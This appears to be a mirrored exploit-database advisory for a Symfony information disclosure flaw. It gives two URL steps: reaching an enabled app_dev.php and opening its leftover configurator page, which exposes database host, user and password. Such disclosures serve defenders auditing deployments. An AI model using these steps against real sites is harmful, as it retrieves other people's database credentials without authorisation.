Symfony Remote Information Disclosure

2018.07.28

Credit: Abdeljalil Nouiri

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Symfony < 2.7.13 - Remote information Disclosure
# Google Dork: N/A
# Date: 6/27/2018
# Exploit Author: Abdeljalil Nouiri (pwny)
# Author Mail : abdel001nouiri[at]gmail[dot]com
# Vendor Homepage: https://www.symfony.com/
# Version: 2.7.13
# Tested on: Win10 x64, Ubuntu
# Exploit :
-STEP 1:
This Vulnerability Will Work if the "app_dev" isn't disabled
url : https://localhost/app_dev.php/
-STEP 2:
the last step of symfony configuration still accessible , this would leak
all information including ( database host/user/password ... etc)
url :https://localhost/app_dev.php/_configurator/final
# POC :
http://prntscr.com/kbuua8

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Symfony Remote Information Disclosure

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.